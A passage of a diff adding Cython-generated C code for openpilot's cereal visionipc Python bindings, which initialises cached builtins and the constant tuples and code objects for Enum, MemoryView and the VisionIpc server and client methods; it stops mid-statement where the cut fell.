+/* #### Code section: cached_builtins ### */ +static CYTHON_SMALL_CODE int __Pyx_InitCachedBuiltins(void) { + __pyx_builtin_staticmethod = __Pyx_GetBuiltinName(__pyx_n_s_staticmethod); if (!__pyx_builtin_staticmethod) __PYX_ERR(0, 163, __pyx_L1_error) + __pyx_builtin_TypeError = __Pyx_GetBuiltinName(__pyx_n_s_TypeError); if (!__pyx_builtin_TypeError) __PYX_ERR(1, 2, __pyx_L1_error) + __pyx_builtin_AssertionError = __Pyx_GetBuiltinName(__pyx_n_s_AssertionError); if (!__pyx_builtin_AssertionError) __PYX_ERR(0, 79, __pyx_L1_error) + __pyx_builtin_ValueError = __Pyx_GetBuiltinName(__pyx_n_s_ValueError); if (!__pyx_builtin_ValueError) __PYX_ERR(1, 33, __pyx_L1_error) + __pyx_builtin___import__ = __Pyx_GetBuiltinName(__pyx_n_s_import); if (!__pyx_builtin___import__) __PYX_ERR(1, 100, __pyx_L1_error) + __pyx_builtin_MemoryError = __Pyx_GetBuiltinName(__pyx_n_s_MemoryError); if (!__pyx_builtin_MemoryError) __PYX_ERR(1, 156, __pyx_L1_error) + __pyx_builtin_enumerate = __Pyx_GetBuiltinName(__pyx_n_s_enumerate); if (!__pyx_builtin_enumerate) __PYX_ERR(1, 159, __pyx_L1_error) + __pyx_builtin_range = __Pyx_GetBuiltinName(__pyx_n_s_range); if (!__pyx_builtin_range) __PYX_ERR(1, 261, __pyx_L1_error) + __pyx_builtin_Ellipsis = __Pyx_GetBuiltinName(__pyx_n_s_Ellipsis); if (!__pyx_builtin_Ellipsis) __PYX_ERR(1, 408, __pyx_L1_error) + __pyx_builtin_id = __Pyx_GetBuiltinName(__pyx_n_s_id); if (!__pyx_builtin_id) __PYX_ERR(1, 618, __pyx_L1_error) + __pyx_builtin_IndexError = __Pyx_GetBuiltinName(__pyx_n_s_IndexError); if (!__pyx_builtin_IndexError) __PYX_ERR(1, 914, __pyx_L1_error) + __pyx_builtin_ImportError = __Pyx_GetBuiltinName(__pyx_n_s_ImportError); if (!__pyx_builtin_ImportError) __PYX_ERR(2, 986, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: cached_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitCachedConstants(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_InitCachedConstants", 0); + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0xe3b0c44, 0xda39a3e, 0xd41d8cd): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())" % __pyx_checksum + */ + __pyx_tuple__2 = PyTuple_Pack(3, __pyx_int_238750788, __pyx_int_228825662, __pyx_int_222419149); if (unlikely(!__pyx_tuple__2)) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__2); + __Pyx_GIVEREF(__pyx_tuple__2); + + /* "View.MemoryView":582 + * def suboffsets(self): + * if self.view.suboffsets == NULL: + * return (-1,) * self.view.ndim # <<<<<<<<<<<<<< + * + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) + */ + __pyx_tuple__6 = PyTuple_New(1); if (unlikely(!__pyx_tuple__6)) __PYX_ERR(1, 582, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__6); + __Pyx_INCREF(__pyx_int_neg_1); + __Pyx_GIVEREF(__pyx_int_neg_1); + PyTuple_SET_ITEM(__pyx_tuple__6, 0, __pyx_int_neg_1); + __Pyx_GIVEREF(__pyx_tuple__6); + + /* "View.MemoryView":679 + * tup = index if isinstance(index, tuple) else (index,) + * + * result = [slice(None)] * ndim # <<<<<<<<<<<<<< + * have_slices = False + * seen_ellipsis = False + */ + __pyx_slice__7 = PySlice_New(Py_None, Py_None, Py_None); if (unlikely(!__pyx_slice__7)) __PYX_ERR(1, 679, __pyx_L1_error) + __Pyx_GOTREF(__pyx_slice__7); + __Pyx_GIVEREF(__pyx_slice__7); + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + */ + __pyx_tuple__10 = PyTuple_Pack(3, __pyx_int_136983863, __pyx_int_112105877, __pyx_int_184977713); if (unlikely(!__pyx_tuple__10)) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__10); + __Pyx_GIVEREF(__pyx_tuple__10); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":986 + * __pyx_import_array() + * except Exception: + * raise ImportError("numpy.core.multiarray failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_umath() except -1: + */ + __pyx_tuple__16 = PyTuple_Pack(1, __pyx_kp_u_numpy_core_multiarray_failed_to); if (unlikely(!__pyx_tuple__16)) __PYX_ERR(2, 986, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__16); + __Pyx_GIVEREF(__pyx_tuple__16); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":992 + * _import_umath() + * except Exception: + * raise ImportError("numpy.core.umath failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_ufunc() except -1: + */ + __pyx_tuple__17 = PyTuple_Pack(1, __pyx_kp_u_numpy_core_umath_failed_to_impor); if (unlikely(!__pyx_tuple__17)) __PYX_ERR(2, 992, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__17); + __Pyx_GIVEREF(__pyx_tuple__17); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + __pyx_tuple__18 = PyTuple_Pack(4, __pyx_n_s_self, __pyx_n_s_state, __pyx_n_s_dict_2, __pyx_n_s_use_setstate); if (unlikely(!__pyx_tuple__18)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__18); + __Pyx_GIVEREF(__pyx_tuple__18); + __pyx_codeobj__19 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__18, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__19)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":16 + * else: + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle___Pyx_EnumMeta__set_state(self, __pyx_state) + */ + __pyx_tuple__20 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_pyx_state); if (unlikely(!__pyx_tuple__20)) __PYX_ERR(1, 16, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__20); + __Pyx_GIVEREF(__pyx_tuple__20); + __pyx_codeobj__21 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__20, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 16, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__21)) __PYX_ERR(1, 16, __pyx_L1_error) + + /* "EnumBase":28 + * cdef object __Pyx_EnumBase + * class __Pyx_EnumBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): # <<<<<<<<<<<<<< + * for v in cls: + * if v == value: + */ + __pyx_tuple__22 = PyTuple_Pack(5, __pyx_n_s_cls, __pyx_n_s_value, __pyx_n_s_name, __pyx_n_s_v, __pyx_n_s_res); if (unlikely(!__pyx_tuple__22)) __PYX_ERR(1, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__22); + __Pyx_GIVEREF(__pyx_tuple__22); + __pyx_codeobj__23 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__22, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_new, 28, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__23)) __PYX_ERR(1, 28, __pyx_L1_error) + __pyx_tuple__24 = PyTuple_Pack(1, ((PyObject *)Py_None)); if (unlikely(!__pyx_tuple__24)) __PYX_ERR(1, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__24); + __Pyx_GIVEREF(__pyx_tuple__24); + + /* "EnumBase":39 + * cls.__members__[name] = res + * return res + * def __repr__(self): # <<<<<<<<<<<<<< + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + */ + __pyx_tuple__25 = PyTuple_Pack(1, __pyx_n_s_self); if (unlikely(!__pyx_tuple__25)) __PYX_ERR(1, 39, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__25); + __Pyx_GIVEREF(__pyx_tuple__25); + __pyx_codeobj__26 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__25, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_repr, 39, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__26)) __PYX_ERR(1, 39, __pyx_L1_error) + + /* "EnumBase":41 + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): # <<<<<<<<<<<<<< + * return "%s.%s" % (self.__class__.__name__, self.name) + * + */ + __pyx_codeobj__27 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__25, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_str, 41, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__27)) __PYX_ERR(1, 41, __pyx_L1_error) + + /* "EnumBase":49 + * cdef object __Pyx_FlagBase + * class __Pyx_FlagBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): # <<<<<<<<<<<<<< + * for v in cls: + * if v == value: + */ + __pyx_codeobj__28 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__22, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_new, 49, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__28)) __PYX_ERR(1, 49, __pyx_L1_error) + __pyx_tuple__29 = PyTuple_Pack(1, ((PyObject *)Py_None)); if (unlikely(!__pyx_tuple__29)) __PYX_ERR(1, 49, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__29); + __Pyx_GIVEREF(__pyx_tuple__29); + + /* "EnumBase":62 + * cls.__members__[name] = res + * return res + * def __repr__(self): # <<<<<<<<<<<<<< + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + */ + __pyx_codeobj__30 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__25, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_repr, 62, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__30)) __PYX_ERR(1, 62, __pyx_L1_error) + + /* "EnumBase":64 + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): # <<<<<<<<<<<<<< + * return "%s.%s" % (self.__class__.__name__, self.name) + * + */ + __pyx_codeobj__31 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__25, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_str, 64, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__31)) __PYX_ERR(1, 64, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __pyx_unpickle___Pyx_EnumMeta(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + __pyx_tuple__32 = PyTuple_Pack(5, __pyx_n_s_pyx_type, __pyx_n_s_pyx_checksum, __pyx_n_s_pyx_state, __pyx_n_s_pyx_PickleError, __pyx_n_s_pyx_result); if (unlikely(!__pyx_tuple__32)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__32); + __Pyx_GIVEREF(__pyx_tuple__32); + __pyx_codeobj__33 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__32, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_pyx_unpickle___Pyx_EnumMeta, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__33)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "View.MemoryView":100 + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: + * if __import__("sys").version_info >= (3, 3): # <<<<<<<<<<<<<< + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + */ + __pyx_tuple__34 = PyTuple_Pack(1, __pyx_n_s_sys); if (unlikely(!__pyx_tuple__34)) __PYX_ERR(1, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__34); + __Pyx_GIVEREF(__pyx_tuple__34); + __pyx_tuple__35 = PyTuple_Pack(2, __pyx_int_3, __pyx_int_3); if (unlikely(!__pyx_tuple__35)) __PYX_ERR(1, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__35); + __Pyx_GIVEREF(__pyx_tuple__35); + + /* "View.MemoryView":101 + * try: + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence # <<<<<<<<<<<<<< + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence + */ + __pyx_tuple__36 = PyTuple_Pack(1, __pyx_kp_s_collections_abc); if (unlikely(!__pyx_tuple__36)) __PYX_ERR(1, 101, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__36); + __Pyx_GIVEREF(__pyx_tuple__36); + + /* "View.MemoryView":103 + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence # <<<<<<<<<<<<<< + * except: + * + */ + __pyx_tuple__37 = PyTuple_Pack(1, __pyx_n_s_collections); if (unlikely(!__pyx_tuple__37)) __PYX_ERR(1, 103, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__37); + __Pyx_GIVEREF(__pyx_tuple__37); + + /* "View.MemoryView":309 + * return self.name + * + * cdef generic = Enum("") # <<<<<<<<<<<<<< + * cdef strided = Enum("") # default + * cdef indirect = Enum("") + */ + __pyx_tuple__38 = PyTuple_Pack(1, __pyx_kp_s_strided_and_direct_or_indirect); if (unlikely(!__pyx_tuple__38)) __PYX_ERR(1, 309, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__38); + __Pyx_GIVEREF(__pyx_tuple__38); + + /* "View.MemoryView":310 + * + * cdef generic = Enum("") + * cdef strided = Enum("") # default # <<<<<<<<<<<<<< + * cdef indirect = Enum("") + * + */ + __pyx_tuple__39 = PyTuple_Pack(1, __pyx_kp_s_strided_and_direct); if (unlikely(!__pyx_tuple__39)) __PYX_ERR(1, 310, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__39); + __Pyx_GIVEREF(__pyx_tuple__39); + + /* "View.MemoryView":311 + * cdef generic = Enum("") + * cdef strided = Enum("") # default + * cdef indirect = Enum("") # <<<<<<<<<<<<<< + * + * + */ + __pyx_tuple__40 = PyTuple_Pack(1, __pyx_kp_s_strided_and_indirect); if (unlikely(!__pyx_tuple__40)) __PYX_ERR(1, 311, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__40); + __Pyx_GIVEREF(__pyx_tuple__40); + + /* "View.MemoryView":314 + * + * + * cdef contiguous = Enum("") # <<<<<<<<<<<<<< + * cdef indirect_contiguous = Enum("") + * + */ + __pyx_tuple__41 = PyTuple_Pack(1, __pyx_kp_s_contiguous_and_direct); if (unlikely(!__pyx_tuple__41)) __PYX_ERR(1, 314, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__41); + __Pyx_GIVEREF(__pyx_tuple__41); + + /* "View.MemoryView":315 + * + * cdef contiguous = Enum("") + * cdef indirect_contiguous = Enum("") # <<<<<<<<<<<<<< + * + * + */ + __pyx_tuple__42 = PyTuple_Pack(1, __pyx_kp_s_contiguous_and_indirect); if (unlikely(!__pyx_tuple__42)) __PYX_ERR(1, 315, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__42); + __Pyx_GIVEREF(__pyx_tuple__42); + + /* "(tree fragment)":1 + * def __pyx_unpickle_Enum(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + __pyx_codeobj__43 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__32, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_pyx_unpickle_Enum, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__43)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "cereal/visionipc/visionipc_pyx.pyx":20 + * + * + * def get_endpoint_name(string name, VisionStreamType stream): # <<<<<<<<<<<<<< + * return cpp_get_endpoint_name(name, stream).decode('utf-8') + * + */ + __pyx_tuple__44 = PyTuple_Pack(2, __pyx_n_s_name, __pyx_n_s_stream); if (unlikely(!__pyx_tuple__44)) __PYX_ERR(0, 20, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__44); + __Pyx_GIVEREF(__pyx_tuple__44); + __pyx_codeobj__45 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__44, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_visionipc_visionipc_pyx_p, __pyx_n_s_get_endpoint_name, 20, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__45)) __PYX_ERR(0, 20, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.buf cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_codeobj__46 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__25, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__46)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.buf cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.buf cannot be converted to a Python object for pickling" + */ + __pyx_codeobj__47 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__20, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 3, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__47)) __PYX_ERR(1, 3, __pyx_L1_error) + + /* "cereal/visionipc/visionipc_pyx.pyx":69 + * self.server = new cppVisionIpcServer(name, NULL, NULL) + * + * def create_buffers(self, VisionStreamType tp, size_t num_buffers, bool rgb, size_t width, size_t height): # <<<<<<<<<<<<<< + * self.server.create_buffers(tp, num_buffers, rgb, width, height) + * + */ + __pyx_tuple__48 = PyTuple_Pack(6, __pyx_n_s_self, __pyx_n_s_tp, __pyx_n_s_num_buffers, __pyx_n_s_rgb, __pyx_n_s_width, __pyx_n_s_height); if (unlikely(!__pyx_tuple__48)) __PYX_ERR(0, 69, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__48); + __Pyx_GIVEREF(__pyx_tuple__48); + __pyx_codeobj__49 = (PyObject*)__Pyx_PyCode_New(6, 0, 0, 6, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__48, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_visionipc_visionipc_pyx_p, __pyx_n_s_create_buffers, 69, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__49)) __PYX_ERR(0, 69, __pyx_L1_error) + + /* "cereal/visionipc/visionipc_pyx.pyx":72 + * self.server.create_buffers(tp, num_buffers, rgb, width, height) + * + * def create_buffers_with_sizes(self, VisionStreamType tp, size_t num_buffers, bool rgb, size_t width, size_t height, size_t size, size_t stride, size_t uv_offset): # <<<<<<<<<<<<<< + * self.server.create_buffers_with_sizes(tp, num_buffers, rgb, width, height, size, stride, uv_offset) + * + */ + __pyx_tuple__50 = PyTuple_Pack(9, __pyx_n_s_self, __pyx_n_s_tp, __pyx_n_s_num_buffers, __pyx_n_s_rgb, __pyx_n_s_width, __pyx_n_s_height, __pyx_n_s_size, __pyx_n_s_stride, __pyx_n_s_uv_offset); if (unlikely(!__pyx_tuple__50)) __PYX_ERR(0, 72, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__50); + __Pyx_GIVEREF(__pyx_tuple__50); + __pyx_codeobj__51 = (PyObject*)__Pyx_PyCode_New(9, 0, 0, 9, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__50, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_visionipc_visionipc_pyx_p, __pyx_n_s_create_buffers_with_sizes, 72, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__51)) __PYX_ERR(0, 72, __pyx_L1_error) + + /* "cereal/visionipc/visionipc_pyx.pyx":75 + * self.server.create_buffers_with_sizes(tp, num_buffers, rgb, width, height, size, stride, uv_offset) + * + * def send(self, VisionStreamType tp, const unsigned char[:] data, uint32_t frame_id=0, uint64_t timestamp_sof=0, uint64_t timestamp_eof=0): # <<<<<<<<<<<<<< + * cdef cppVisionBuf * buf = self.server.get_buffer(tp) + * + */ + __pyx_tuple__52 = PyTuple_Pack(8, __pyx_n_s_self, __pyx_n_s_tp, __pyx_n_s_data, __pyx_n_s_frame_id, __pyx_n_s_timestamp_sof, __pyx_n_s_timestamp_eof, __pyx_n_s_buf, __pyx_n_s_extra); if (unlikely(!__pyx_tuple__52)) __PYX_ERR(0, 75, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__52); + __Pyx_GIVEREF(__pyx_tuple__52); + __pyx_codeobj__53 = (PyObject*)__Pyx_PyCode_New(6, 0, 0, 8, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__52, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_visionipc_visionipc_pyx_p, __pyx_n_s_send, 75, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__53)) __PYX_ERR(0, 75, __pyx_L1_error) + __pyx_tuple__54 = PyTuple_Pack(3, __pyx_int_0, __pyx_int_0, __pyx_int_0); if (unlikely(!__pyx_tuple__54)) __PYX_ERR(0, 75, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__54); + __Pyx_GIVEREF(__pyx_tuple__54); + + /* "cereal/visionipc/visionipc_pyx.pyx":90 + * self.server.send(buf, &extra, False) + * + * def start_listener(self): # <<<<<<<<<<<<<< + * self.server.start_listener() + * + */ + __pyx_codeobj__55 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__25, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_visionipc_visionipc_pyx_p, __pyx_n_s_start_listener, 90, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__55)) __PYX_ERR(0, 90, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.server cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_codeobj__56 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__25, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__56)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.server cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.server cannot be converted to a Python object for pickling" + */ + __pyx_codeobj__57 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__20, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 3, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__57)) __PYX_ERR(1, 3, __pyx_L1_error) + + /* "cereal/visionipc/visionipc_pyx.pyx":151 + * return self.extra.valid + * + * def recv(self, int timeout_ms=100): # <<<<<<<<<<<<<< + * buf = self.client.recv(&self.extra, timeout_ms) + * if not buf: + */ + __pyx_tuple__58 = PyTuple_Pack(3, __pyx_n_s_self, __pyx_n_s_timeout_ms, __pyx_n_s_buf); if (unlikely(!__pyx_tuple__58)) __PYX_ERR(0, 151, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__58); + __Pyx_GIVEREF(__pyx_tuple__58); + __pyx_codeobj__59 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__58, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_visionipc_visionipc_pyx_p, __pyx_n_s_recv, 151, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__59)) __PYX_ERR(0, 151, __pyx_L1_error) + __pyx_tuple__60 = PyTuple_Pack(1, __pyx_int_100); if (unlikely(!__pyx_tuple__60)) __PYX_ERR(0, 151, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__60); + __Pyx_GIVEREF(__pyx_tuple__60); + + /* "cereal/visionipc/visionipc_pyx.pyx":157 + * return VisionBuf.create(buf) + * + * def connect(self, bool blocking): # <<<<<<<<<<<<<< + * return self.client.connect(blocking) + * + */ + __pyx_tuple__61 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_blocking); if (unlikely(!__pyx_tuple__61)) __PYX_ERR(0, 157, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__61); + __Pyx_GIVEREF(__pyx_tuple__61); + __pyx_codeobj__62 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__61, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_visionipc_visionipc_pyx_p, __pyx_n_s_connect, 157, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__62)) __PYX_ERR(0, 157, __pyx_L1_error) + + /* "cereal/visionipc/visionipc_pyx.pyx":160 + * return self.client.connect(blocking) + * + * def is_connected(self): # <<<<<<<<<<<<<< + * return self.client.is_connected() + * + */ + __pyx_codeobj__63 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, 